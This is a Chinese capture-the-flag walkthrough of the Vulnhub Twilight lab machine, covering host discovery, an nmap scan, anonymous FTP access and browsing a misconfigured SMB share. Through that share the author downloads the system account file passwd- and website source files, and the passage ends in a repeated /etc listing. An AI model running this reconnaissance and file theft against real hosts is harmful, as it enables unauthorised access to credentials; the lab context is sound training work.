Vulnhub Twilight靶机解题详细过程
Twilight
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.89.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:0c:40:47 1 60 PCS Systemtechnik GmbH
192.168.56.174 08:00:27:aa:5d:c5 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.174
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.174 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 21:01 EST
Nmap scan report for bogon (192.168.56.174)
Host is up (0.00044s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
| 256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
|_ 256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
25/tcp open smtp Exim smtpd 4.92
| smtp-commands: twilight Hello bogon [192.168.56.137], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 35 Jul 16 2020 22253251-65325.twilight
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.56.174:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
| Thread ID: 39
| Capabilities flags: 63486
| Some Capabilities: FoundRows, ODBCClient, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, Support41Auth, SupportsCompression, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: R[Uvtcq09l5aile3lG^'
|_ Auth Plugin Name: mysql_native_password
8080/tcp open http PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
63525/tcp open http PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
MAC Address: 08:00:27:AA:5D:C5 (Oracle VirtualBox virtual NIC)
Service Info: Host: twilight; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m55s, deviation: 2h53m14s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: twilight
| NetBIOS computer name: TWILIGHT\x00
| Domain name: \x00
| FQDN: twilight
|_ System time: 2022-11-12T21:01:47-05:00
|_nbstat: NetBIOS name: TWILIGHT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-13T02:01:58
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.42 seconds
目标主机开放的端口较多,接下来依次对这些端口进行enumeration,从FTP服务开始。
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ ftp 192.168.56.174 -P 2121
Connected to 192.168.56.174.
220 pyftpdlib 1.5.6 ready.
Name (192.168.56.174:kali): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering extended passive mode (|||59871|).
550 No such file or directory.
ftp> ls
229 Entering extended passive mode (|||52649|).
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 35 Jul 16 2020 22253251-65325.twilight
226 Transfer complete.
ftp> get 22253251-65325.twilight
local: 22253251-65325.twilight remote: 22253251-65325.twilight
229 Entering extended passive mode (|||33017|).
125 Data connection already open. Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 35 42.56 KiB/s 00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (39.88 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ ls
22253251-65325.twilight nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ cat 22253251-65325.twilight
Sg?~;
dg
14
V+Y<(^\4cdUpv7 -N'z2
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ searchsploit pyftpdlib
Exploits: No Results
Shellcodes: No Results
目标主机虽然允许匿名访问,但只有一个文件,将其下载到Kali Linux本地,查看文件内容,目前还不知道有什么含义。而且该软件的漏洞也没有查找到。
接下来看一下SMB服务,可以直接读取和下载大量文件(奇怪):
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ smbclient -L 192.168.56.174
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
WRKSHARE Disk Workplace Share. Do not access if not an employee.
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP TWILIGHT
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ smbclient //192.168.56.174/WRKSHARE
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 8 18:57:09 2020
.. D 0 Wed Jul 8 18:57:09 2020
root D 0 Thu Jul 16 09:50:46 2020
run D 0 Sat Nov 12 20:38:46 2022
lost+found D 0 Wed Jul 8 18:08:46 2020
initrd.img N 25814661 Wed Jul 8 18:58:16 2020
etc D 0 Thu Jul 16 09:54:54 2020
proc D 0 Sat Nov 12 20:38:48 2022
vmlinuz N 5274864 Sun Jun 7 11:42:22 2020
initrd.img.old N 25807574 Wed Jul 8 18:58:02 2020
opt D 0 Wed Jul 8 18:09:01 2020
srv D 0 Wed Jul 8 18:09:01 2020
sys D 0 Sat Nov 12 20:38:39 2022
lib64 D 0 Wed Jul 8 18:09:08 2020
sbin D 0 Thu Jul 16 09:53:39 2020
media D 0 Wed Jul 8 18:08:46 2020
bin D 0 Thu Jul 16 08:22:20 2020
usr D 0 Wed Jul 8 18:09:01 2020
lib32 D 0 Wed Jul 8 18:08:56 2020
dev D 0 Sat Nov 12 20:38:41 2022
lib D 0 Wed Jul 8 22:20:29 2020
vmlinuz.old N 5274864 Mon Apr 27 01:05:39 2020
libx32 D 0 Wed Jul 8 18:08:56 2020
home D 0 Wed Jul 8 19:15:56 2020
mnt D 0 Wed Jul 8 18:09:01 2020
var D 0 Wed Jul 8 20:03:27 2020
boot D 0 Wed Jul 8 19:06:53 2020
tmp D 0 Sat Nov 12 20:53:41 2022
7158264 blocks of size 1024. 4447424 blocks available
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> cd /etc/
smb: \etc\> ls
. D 0 Thu Jul 16 09:54:54 2020
.. D 0 Wed Jul 8 18:57:09 2020
insserv.conf.d D 0 Wed Jul 8 22:20:44 2020
shadow- N 1036 Wed Jul 8 22:20:36 2020
mime.types N 24512 Sat Feb 9 07:32:33 2019
deluser.conf N 604 Sun Jun 26 16:00:56 2016
cron.monthly D 0 Wed Jul 8 19:06:17 2020
hosts.deny N 711 Wed Jul 8 21:35:11 2020
crontab N 1042 Fri Oct 11 03:58:52 2019
udev D 0 Wed Jul 8 18:58:03 2020
profile.d D 0 Wed Jul 8 22:20:41 2020
rpc N 887 Sat Feb 9 21:05:36 2019
subgid- N 0 Wed Jul 8 18:09:32 2020
cron.weekly D 0 Wed Jul 8 19:06:17 2020
mailcap N 2579 Wed Jul 8 21:46:45 2020
console-setup D 0 Wed Jul 8 18:11:00 2020
hosts.allow N 411 Wed Jul 8 21:35:11 2020
libnl-3 D 0 Wed Jul 8 19:06:19 2020
magic.mime N 111 Tue Oct 22 15:57:17 2019
gss D 0 Wed Jul 8 20:03:22 2020
ufw D 0 Wed Jul 8 21:35:06 2020
passwd N 1594 Thu Jul 16 09:34:39 2020
hostname N 9 Wed Jul 8 18:09:53 2020
ld.so.cache N 28325 Thu Jul 16 08:22:20 2020
gshadow N 706 Wed Jul 8 22:20:36 2020
rc4.d D 0 Wed Jul 8 22:26:59 2020
ld.so.conf.d D 0 Thu Jul 16 08:22:18 2020
hosts N 188 Wed Jul 8 18:09:53 2020
dpkg D 0 Thu Jul 16 08:22:19 2020
ifplugd D 0 Wed Jul 8 19:06:16 2020
pam.d D 0 Wed Jul 8 21:46:36 2020
ca-certificates D 0 Wed Jul 8 20:03:28 2020
alternatives D 0 Thu Jul 16 08:22:20 2020
protocols N 2932 Sat Feb 9 21:05:36 2019
rc0.d D 0 Wed Jul 8 22:26:59 2020
shadow N 1036 Thu Jul 16 09:54:54 2020
wgetrc N 4942 Fri Apr 5 09:36:38 2019
networks N 60 Wed Jul 8 18:09:49 2020
logrotate.conf N 435 Wed Aug 22 03:05:31 2018
bash.bashrc N 1994 Thu Apr 18 00:12:36 2019
python2.7 D 0 Wed Jul 8 21:45:56 2020
mtab N 0 Sat Nov 12 21:07:45 2022
xattr.conf N 642 Fri Mar 1 17:03:21 2019
terminfo D 0 Wed Jul 8 18:09:27 2020
ucf.conf N 1260 Fri Dec 14 03:51:14 2018
ldap D 0 Wed Jul 8 20:03:32 2020
debian_version N 5 Sat May 2 06:00:00 2020
bluetooth D 0 Wed Jul 8 19:06:20 2020
cron.daily D 0 Wed Jul 8 21:46:40 2020
opt D 0 Wed Jul 8 18:09:01 2020
avahi D 0 Wed Jul 8 19:06:27 2020
subgid N 20 Wed Jul 8 19:15:56 2020
apt D 0 Wed Jul 8 21:57:12 2020
python3 D 0 Wed Jul 8 18:10:38 2020
mailcap.order N 449 Sat Feb 9 07:32:33 2019
email-addresses N 312 Wed May 13 12:01:31 2020
modules N 195 Wed Jul 8 18:09:47 2020
xdg D 0 Wed Jul 8 19:06:17 2020
default D 0 Wed Jul 8 22:26:59 2020
resolv.conf N 25 Thu Jul 16 09:52:50 2020
initramfs-tools D 0 Wed Jul 8 18:10:01 2020
ppp D 0 Wed Jul 8 21:45:50 2020
rmt N 60376 Tue Apr 23 12:05:54 2019
libibverbs.d D 0 Wed Jul 8 21:46:34 2020
calendar D 0 Wed Jul 8 18:09:51 2020
logrotate.d D 0 Wed Jul 8 22:20:44 2020
motd N 286 Sat Feb 1 12:09:26 2020
dhcp D 0 Wed Jul 8 18:09:50 2020
rc3.d D 0 Wed Jul 8 22:26:59 2020
host.conf N 9 Mon Aug 7 13:14:09 2006
tmpfiles.d D 0 Wed Jan 29 13:07:53 2020
group N 838 Thu Jul 16 08:43:11 2020
update-motd.d D 0 Wed Jul 8 18:56:28 2020
wpa_supplicant D 0 Wed Jul 8 19:06:28 2020
dbus-1 D 0 Wed Jul 8 19:06:03 2020
issue N 27 Sat Feb 1 12:09:26 2020
securetty N 4141 Fri Jul 27 04:07:37 2018
dictionaries-common D 0 Wed Jul 8 19:06:30 2020
cron.hourly D 0 Wed Jul 8 18:09:50 2020
mailname N 9 Wed Jul 8 21:45:57 2020
rc1.d D 0 Wed Jul 8 22:26:59 2020
timezone N 17 Wed Jul 8 18:57:25 2020
init.d D 0 Wed Jul 8 22:26:59 2020
anacrontab N 401 Sun May 19 08:42:01 2019
bindresvport.blacklist N 367 Fri Mar 2 15:03:58 2018
rsyslog.d D 0 Tue Feb 26 12:43:39 2019
nanorc N 9278 Tue Jun 11 20:23:23 2019
kernel-img.conf N 144 Wed Jul 8 19:15:54 2020
discover-modprobe.conf N 346 Sun Jan 14 16:27:01 2018
services N 18774 Sat Feb 9 21:05:36 2019
sudoers N 669 Wed Jul 8 21:44:33 2020
lighttpd D 0 Thu Jul 16 08:22:15 2020
subuid- N 0 Wed Jul 8 18:09:32 2020
rc2.d D 0 Wed Jul 8 22:26:59 2020
gai.conf N 2584 Wed Aug 1 01:10:47 2018
vim D 0 Wed Jul 8 18:09:50 2020
systemd D 0 Wed Jul 8 18:56:31 2020
libaudit.conf N 191 Thu Apr 25 10:47:32 2019
network D 0 Wed Jul 8 18:09:51 2020
rc5.d D 0 Wed Jul 8 22:26:59 2020
iproute2 D 0 Wed Jul 8 18:09:50 2020
localtime N 3545 Mon Apr 27 06:46:23 2020
apache2 D 0 Wed Jul 8 20:03:50 2020
ssh D 0 Wed Jul 8 21:36:00 2020
skel D 0 Wed Jul 8 18:09:28 2020
group- N 825 Wed Jul 8 21:46:40 2020
gshadow- N 696 Wed Jul 8 21:46:40 2020
ssl D 0 Wed Jul 8 20:03:32 2020
netconfig N 767 Tue Dec 11 09:41:49 2018
magic N 111 Tue Oct 22 15:57:17 2019
ld.so.conf N 34 Fri Mar 2 15:03:58 2018
sudoers.d D 0 Wed Jul 8 21:44:15 2020
aliases N 198 Wed Jul 8 21:45:57 2020
X11 D 0 Wed Jul 8 21:46:28 2020
cron.d D 0 Wed Jul 8 20:03:32 2020
modules-load.d D 0 Wed Jul 8 18:56:30 2020
locale.alias N 2995 Wed May 1 13:24:19 2019
.pwd.lock H 0 Wed Jul 8 18:09:31 2020
kernel D 0 Wed Jul 8 18:10:01 2020
fstab N 734 Wed Jul 8 18:08:47 2020
subuid N 20 Wed Jul 8 19:15:56 2020
perl D 0 Wed Jul 8 20:03:19 2020
python D 0 Wed Jul 8 21:46:38 2020
profile N 767 Fri Mar 4 06:00:00 2016
selinux D 0 Wed Jul 8 18:09:27 2020
emacs D 0 Wed Jul 8 19:06:05 2020
sysctl.conf N 2351 Thu May 31 05:42:46 2018
sysctl.d D 0 Wed Jul 8 18:56:30 2020
shells N 116 Wed Jul 8 18:09:30 2020
inputrc N 1748 Sat May 5 10:52:46 2018
security D 0 Wed Jul 8 18:09:30 2020
pam.conf N 552 Thu Feb 14 02:08:47 2019
environment N 0 Wed Jul 8 18:09:30 2020
exim4 D 0 Wed Jul 8 22:28:45 2020
samba D 0 Thu Jul 16 08:47:24 2020
debconf.conf N 2969 Tue Feb 26 04:30:35 2019
rc6.d D 0 Wed Jul 8 22:26:59 2020
issue.net N 20 Sat Feb 1 12:09:26 2020
grub.d D 0 Wed Jul 8 19:06:44 2020
os-release N 261 Sat May 2 12:39:00 2020
modprobe.d D 0 Sat Feb 9 18:00:31 2019
login.defs N 10477 Fri Jul 27 04:07:37 2018
rcS.d D 0 Wed Jul 8 18:10:58 2020
mke2fs.conf N 812 Thu Jan 9 20:19:57 2020
passwd- N 1579 Wed Jul 8 22:20:36 2020
apparmor D 0 Wed Jul 8 18:10:40 2020
adduser.conf N 2981 Wed Jul 8 18:09:32 2020
ca-certificates.conf N 5434 Wed Jul 8 20:03:35 2020
adjtime N 44 Wed Jul 8 19:16:03 2020
nsswitch.conf N 494 Sun Feb 10 11:13:53 2019
logcheck D 0 Wed Jul 8 22:20:36 2020
php D 0 Wed Jul 8 20:03:30 2020
fonts D 0 Wed Jul 15 21:36:05 2020
locale.gen N 9376 Wed Jul 8 18:09:57 2020
mysql D 0 Wed Jul 8 22:20:47 2020
machine-id N 33 Wed Jul 8 18:09:36 2020
apparmor.d D 0 Wed Jul 8 22:20:44 2020
rsyslog.conf N 1988 Tue Feb 26 12:43:39 2019
python3.7 D 0 Wed Jul 8 18:10:03 2020
discover.conf.d D 0 Wed Jul 8 18:58:26 2020
binfmt.d D 0 Wed Jan 29 13:07:53 2020
7158264 blocks of size 1024. 4447420 blocks available
smb: \etc\> get passwd-
getting file \etc\passwd- of size 1579 as passwd- (771.0 KiloBytes/sec) (average 771.0 KiloBytes/sec)
smb: \etc\> cd ..
smb: \> ls
. D 0 Wed Jul 8 18:57:09 2020
.. D 0 Wed Jul 8 18:57:09 2020
root D 0 Thu Jul 16 09:50:46 2020
run D 0 Sat Nov 12 20:38:46 2022
lost+found D 0 Wed Jul 8 18:08:46 2020
initrd.img N 25814661 Wed Jul 8 18:58:16 2020
etc D 0 Thu Jul 16 09:54:54 2020
proc D 0 Sat Nov 12 20:38:48 2022
vmlinuz N 5274864 Sun Jun 7 11:42:22 2020
initrd.img.old N 25807574 Wed Jul 8 18:58:02 2020
opt D 0 Wed Jul 8 18:09:01 2020
srv D 0 Wed Jul 8 18:09:01 2020
sys D 0 Sat Nov 12 21:07:45 2022
lib64 D 0 Wed Jul 8 18:09:08 2020
sbin D 0 Thu Jul 16 09:53:39 2020
media D 0 Wed Jul 8 18:08:46 2020
bin D 0 Thu Jul 16 08:22:20 2020
usr D 0 Wed Jul 8 18:09:01 2020
lib32 D 0 Wed Jul 8 18:08:56 2020
dev D 0 Sat Nov 12 20:38:41 2022
lib D 0 Wed Jul 8 22:20:29 2020
vmlinuz.old N 5274864 Mon Apr 27 01:05:39 2020
libx32 D 0 Wed Jul 8 18:08:56 2020
home D 0 Wed Jul 8 19:15:56 2020
mnt D 0 Wed Jul 8 18:09:01 2020
var D 0 Wed Jul 8 20:03:27 2020
boot D 0 Wed Jul 8 19:06:53 2020
tmp D 0 Sat Nov 12 20:53:41 2022
7158264 blocks of size 1024. 4447420 blocks available
smb: \> cd /root
smb: \root\> ls
NT_STATUS_ACCESS_DENIED listing \root\*
smb: \root\> cd /var/www/html
smb: \var\www\html\> ls
. D 0 Thu Jul 16 09:43:26 2020
.. D 0 Wed Jul 15 21:44:37 2020
current.php N 152 Wed Jul 15 21:58:35 2020
lang.php N 58 Wed Jul 15 22:03:45 2020
gallery D 0 Wed Jul 8 22:31:53 2020
index.php N 228 Wed Jul 15 22:03:51 2020
7158264 blocks of size 1024. 4447420 blocks available
smb: \var\www\html\> get index.php
getting file \var\www\html\index.php of size 228 as index.php (222.6 KiloBytes/sec) (average 588.2 KiloBytes/sec)
smb: \var\www\html\> get lang.php
getting file \var\www\html\lang.php of size 58 as lang.php (28.3 KiloBytes/sec) (average 364.3 KiloBytes/sec)
smb: \var\www\html\> get current.php
getting file \var\www\html\current.php of size 152 as current.php (74.2 KiloBytes/sec) (average 281.4 KiloBytes/sec)
smb: \var\www\html\> cd gallery
smb: \var\www\html\gallery\> ls
. D 0 Wed Jul 8 22:31:53 2020
.. D 0 Thu Jul 16 09:43:26 2020
maxImageUpload.zip N 10854 Tue Dec 28 00:12:23 2010
readme.txt N 534 Wed Mar 19 10:57:58 2008
thumbnail D 0 Wed Jul 8 22:11:42 2020
original D 0 Wed Jul 8 22:32:29 2020
normal D 0 Wed Jul 8 22:11:42 2020
style D 0 Tue Mar 18 11:26:50 2008
maxImageUpload.class.php N 8916 Wed Mar 19 10:52:38 2008
index.php N 601 Tue Mar 18 11:31:00 2008
7158264 blocks of size 1024. 4447420 blocks available
smb: \var\www\html\gallery\> get maxImageUpload.zip
getting file \var\www\html\gallery\maxImageUpload.zip of size 10854 as maxImageUpload.zip (3533.1 KiloBytes/sec) (average 1256.9 KiloBytes/sec)
smb: \var\www\html\gallery\> get readme.txt
getting file \var\www\html\gallery\readme.txt of size 534 as readme.txt (260.7 KiloBytes/sec) (average 1090.9 KiloBytes/sec)
smb: \var\www\html\gallery\> cd original
smb: \var\www\html\gallery\original\> ls
. D 0 Wed Jul 8 22:32:29 2020
.. D 0 Wed Jul 8 22:31:53 2020
7158264 blocks of size 1024. 4447412 blocks available
smb: \var\www\html\gallery\original\> cd ..
smb: \var\www\html\gallery\> cd normal
smb: \var\www\html\gallery\normal\> get maxImageUpload.class.php
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \var\www\html\gallery\normal\maxImageUpload.class.php
smb: \var\www\html\gallery\normal\> cd ..
smb: \var\www\html\gallery\> get maxImageUpload.class.php
getting file \var\www\html\gallery\maxImageUpload.class.php of size 8916 as maxImageUpload.class.php (4353.3 KiloBytes/sec) (average 1557.0 KiloBytes/sec)
smb: \var\www\html\gallery\> cd ..
smb: \var\www\html\> cd ..
smb: \var\www\> cd html
smb: \var\www\html\> ls
. D 0 Thu Jul 16 09:43:26 2020
.. D 0 Wed Jul 15 21:44:37 2020
current.php N 152 Wed Jul 15 21:58:35 2020
lang.php N 58 Wed Jul 15 22:03:45 2020
gallery D 0 Wed Jul 8 22:31:53 2020
index.php N 228 Wed Jul 15 22:03:51 2020
7158264 blocks of size 1024. 4447412 blocks available
smb: \var\www\html\> cd /etc
smb: \etc\> ls
. D 0 Thu Jul 16 09:54:54 2020
.. D 0 Wed Jul 8 18:57:09 2020
insserv.conf.d D 0 Wed Jul 8 22:20:44 2020
shadow- N 1036 Wed Jul 8 22:20:36 2020
mime.types N 24512 Sat Feb 9 07:32:33 2019
deluser.conf N 604 Sun Jun 26 16:00:56 2016
cron.monthly D 0 Wed Jul 8 19:06:17 2020
hosts.deny N 711 Wed Jul 8 21:35:11 2020
crontab N 1042 Fri Oct 11 03:58:52 2019
udev D 0 Wed Jul 8 18:58:03 2020
profile.d D 0 Wed Jul 8 22:20:41 2020
rpc N 887 Sat Feb 9 21:05:36 2019
subgid- N 0 Wed Jul 8 18:09:32 2020
cron.weekly D 0 Wed Jul 8 19:06:17 2020
mailcap N 2579 Wed Jul 8 21:46:45 2020
console-setup D 0 Wed Jul 8 18:11:00 2020
hosts.allow N 411 Wed Jul 8 21:35:11 2020
libnl-3 D 0 Wed Jul 8 19:06:19 2020
magic.mime N 111 Tue Oct 22 15:57:17 2019
gss D 0 Wed Jul 8 20:03:22 2020
ufw D 0 Wed Jul 8 21:35:06 2020
passwd N 1594 Thu Jul 16 09:34:39 2020
hostname N 9 Wed Jul 8 18:09:53 2020
ld.so.cache N 28325 Thu Jul 16 08:22:20 2020
gshadow N 706 Wed Jul 8 22:20:36 2020
rc4.d D 0 Wed Jul 8 22:26:59 2020
ld.so.conf.d D 0 Thu Jul 16 08:22:18 2020
hosts N 188 Wed Jul 8 18:09:53 2020
dpkg D 0 Thu Jul 16 08:22:19 2020
ifplugd D 0 Wed Jul 8 19:06:16 2020
pam.d D 0 Wed Jul 8 21:46:36 2020
ca-certificates D 0 Wed Jul 8 20:03:28 2020
alternatives D 0 Thu Jul 16 08:22:20 2020
protocols N 2932 Sat Feb 9 21:05:36 2019
rc0.d D 0 Wed Jul 8 22:26:59 2020
shadow N 1036 Thu Jul 16 09:54:54 2020
wgetrc N 4942 Fri Apr 5 09:36:38 2019
networks N 60 Wed Jul 8 18:09:49 2020
logrotate.conf N 435 Wed Aug 22 03:05:31 2018
bash.bashrc N 1994 Thu Apr 18 00:12:36 2019
python2.7 D 0 Wed Jul 8 21:45:56 2020
mtab N 0 Sat Nov 12 21:07:45 2022
xattr.conf N 642 Fri Mar 1 17:03:21 2019
terminfo D 0 Wed Jul 8 18:09:27 2020
ucf.conf N 1260 Fri Dec 14 03:51:14 2018
ldap D 0 Wed Jul 8 20:03:32 2020
debian_version N 5 Sat May 2 06:00:00 2020
bluetooth D 0 Wed Jul 8 19:06:20 2020
cron.daily D 0 Wed Jul 8 21:46:40 2020
opt D 0 Wed Jul 8 18:09:01 2020
avahi D 0 Wed Jul 8 19:06:27 2020
subgid N 20 Wed Jul 8 19:15:56 2020
apt D 0 Wed Jul 8 21:57:12 2020
python3 D 0 Wed Jul 8 18:10:38 2020
mailcap.order N 449 Sat Feb 9 07:32:33 2019
email-addresses N 312 Wed May 13 12:01:31 2020
modules N 195 Wed Jul 8 18:09:47 2020
xdg D 0 Wed Jul 8 19:06:17 2020
default D 0 Wed Jul 8 22:26:59 2020
resolv.conf N 25 Thu Jul 16 09:52:50 2020
initramfs-tools D 0 Wed Jul 8 18:10:01 2020
ppp D 0 Wed Jul 8 21:45:50 2020
rmt N 60376 Tue Apr 23 12:05:54 2019
libibverbs.d D 0 Wed Jul 8 21:46:34 2020
calendar D 0 Wed Jul 8 18:09:51 2020
logrotate.d D 0 Wed Jul 8 22:20:44 2020
motd N 286 Sat Feb 1 12:09:26 2020
dhcp D 0 Wed Jul 8 18:09:50 2020
rc3.d D 0 Wed Jul 8 22:26:59 2020
host.conf N 9 Mon Aug 7 13:14:09 2006
tmpfiles.d D 0 Wed Jan 29 13:07:53 2020
group N 838 Thu Jul 16 08:43:11 2020
update-motd.d D 0 Wed Jul 8 18:56:28 2020
wpa_supplicant D 0 Wed Jul 8 19:06:28 2020
dbus-1 D 0 Wed Jul 8 19:06:03 2020
issue N 27 Sat Feb 1 12:09:26 2020
securetty N 4141 Fri Jul 27 04:07:37 2018
dictionaries-common D 0 Wed Jul 8 19:06:30 2020
cron.hourly D 0 Wed Jul 8 18:09:50 2020
mailname N 9 Wed Jul 8 21:45:57 2020
rc1.d D 0 Wed Jul 8 22:26:59 2020
timezone N 17 Wed Jul 8 18:57:25 2020
init.d D 0 Wed Jul 8 22:26:59 2020
anacrontab N 401 Sun May 19 08:42:01 2019
bindresvport.blacklist N 367 Fri Mar 2 15:03:58 2018
rsyslog.d D 0 Tue Feb 26 12:43:39 2019
nanorc N 9278 Tue Jun 11 20:23:23 2019
kernel-img.conf N 144 Wed Jul 8 19:15:54 2020
discover-modprobe.conf N 346 Sun Jan 14 16:27:01 2018
services N 18774 Sat Feb 9 21:05:36 2019
sudoers N 669 Wed Jul 8 21:44:33 2020
lighttpd D 0 Thu Jul 16 08:22:15 2020
subuid- N 0 Wed Jul 8 18:09:32 2020
rc2.d D 0 Wed Jul 8 22:26:59 2020
gai.conf N 2584 Wed Aug 1 01:10:47 2018
vim D 0 Wed Jul 8 18:09:50 2020
systemd D 0 Wed Jul 8 18:56:31 2020
libaudit.conf N 191 Thu Apr 25 10:47:32 2019
network D 0 Wed Jul 8 18:09:51 2020
rc5.d D 0 Wed Jul 8 22:26:59 2020
iproute2 D 0 Wed Jul 8 18:09:50 2020
localtime N 3545 Mon Apr 27 06:46:23 2020
apache2 D 0 Wed Jul 8 20:03:50 2020
ssh D 0 Wed Jul 8 21:36:00 2020
skel D 0 Wed Jul 8 18:09:28 2020
group- N 825 Wed Jul 8 21:46:40 2020
gshadow- N 696 Wed Jul 8 21:46:40 2020
ssl D 0 Wed Jul 8 20:03:32 2020
netconfig N 767 Tue Dec 11 09:41:49 2018
magic N 111 Tue Oct 22 15:57:17 2019
ld.so.conf N 34 Fri Mar 2 15:03:58 2018
sudoers.d D 0 Wed Jul 8 21:44:15 2020
aliases N 198 Wed Jul 8 21:45:57 2020
X11 D 0 Wed Jul 8 21:46:28 2020
cron.d D 0 Wed Jul 8 20:03:32 2020
modules-load.d D 0 Wed Jul 8 18:56:30 2020
locale.alias N 2995 Wed May 1 13:24:19 2019
.pwd.lock H 0 Wed Jul 8 18:09:31 2020
kernel D 0 Wed Jul 8 18:10:01 2020
fstab N 734 Wed Jul 8 18:08:47 2020
subuid N 20 Wed Jul 8 19:15:56 2020
perl D 0 Wed Jul 8 20:03:19 2020
python D 0 Wed Jul 8 21:46:38 2020
profile N 767 Fri Mar 4 06:00:00 2016
selinux D 0 Wed Jul 8 18:09:27 2020
emacs D 0 Wed Jul 8 19:06:05 2020
sysctl.conf N 2351 Thu May 31 05:42:46 2018
sysctl.d D 0 Wed Jul 8 18:56:30 2020
shells N 116 Wed Jul 8 18:09:30 2020
inputrc N 1748 Sat May 5 10:52:46 2018
security D 0 Wed Jul 8 18:09:30 2020
pam.conf N 552 Thu Feb 14 02:08:47 2019
environment N 0 Wed Jul 8 18:09:30 2020
exim4 D 0 Wed Jul 8 22:28:45 2020
samba D 0 Thu Jul 16 08:47:24 2020
debconf.conf N 2969 Tue Feb 26 04:30:35 2019
rc6.d D 0 Wed Jul 8 22:26:59 2020
issue.net N 20 Sat Feb 1 12:09:26 2020
grub.d D 0 Wed Jul 8 19:06:44 2020
os-release N 261 Sat May 2 12:39:00 2020
modprobe.d D 0 Sat Feb 9 18:00:31 2019
login.defs N 10477 Fri Jul 27 04:07:37 2018
rcS.d D 0 Wed Jul 8 18:10:58 2020
mke2fs.conf N 812 Thu Jan 9 20:19:57 2020
passwd- N 1579 Wed Jul 8 22:20:36 2020
apparmor D 0 Wed Jul 8 18:10:40 2020
adduser.conf N 2981 Wed Jul 8 18:09:32 2020
ca-certificates.conf N 5434 Wed Jul 8 20:03:35 2020
adjtime N 44 Wed Jul 8 19:16:03 2020
nsswitch.conf N 494 Sun Feb 10 11:13:53 2019
logcheck D 0 Wed Jul 8 22:20:36 2020
php D 0 Wed Jul 8 20:03:30 2020
fonts D 0 Wed Jul 15 21:36:05 2020
locale.gen N 9376 Wed Jul 8 18:09:57 2020
mysql D 0 Wed Jul 8 22:20:47 2020
machine-id N 33 Wed Jul 8 18:09:36 2020
apparmor.d D 0 Wed Jul 8 22:20:44 2020
rsyslog.conf N 1988 Tue Feb 26 12:43:39 2019
python3.7 D 0 Wed Jul 8 18:10:03 2020
